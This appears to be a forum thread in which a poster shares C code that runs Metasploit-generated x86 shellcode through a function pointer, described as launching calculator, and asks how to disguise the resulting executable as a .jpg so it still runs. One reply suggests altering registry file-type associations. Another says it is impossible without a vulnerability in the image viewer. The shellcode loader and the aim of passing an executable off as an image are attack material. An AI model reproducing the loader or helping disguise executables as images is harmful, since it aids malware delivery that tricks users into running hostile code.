Hi guys there was a previous post on these forums using the code to launch calculator.exe which i have posted below . Now the file that is generated is an .exe file . How can i rename that .exe to .jpg and still cause the shell code to execute. I know by changing the extension to say.jpg the asscoiated application starts running that file and for an .exe file to launch the presence of exe is necesaary in the extension. My question is how can i cause a code to run from a non exe file. Any hint or samples would greatly be appreciated. Another member here had posted a code which generated a .jpg file .but that didnt work any ideas again would be appreciated

#include <stdio.h>

// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int  main()
{
   void (*shell)(); // Function pointer.
        shell = (void(*)()) (&shellCode);

   printf("Shellcode at: %p\n", shellCode);
   printf("Function pointer points to: %p\n", shell);

   // Run it!
        printf("Running shellcode...\n");
   shell();

        return 0;
}

I think that there was also a way to modify the registry CLASSES section to mark JPG as executable.   I don't remember how to do it, but I remember reading about it.   You would obviously need to be able to modify the user's registry.

As I said before, you can't. Unless you renamed the extension to scr or something. The closest thing you can get to is changing the thumbnail image or something. jpg is data and will only be interpreted as data by an associated file viewer.. Unless you find vuln in file viewer, you cannot execute that code.

You are bashing your head against a brick wall here. Good to be proved wrong though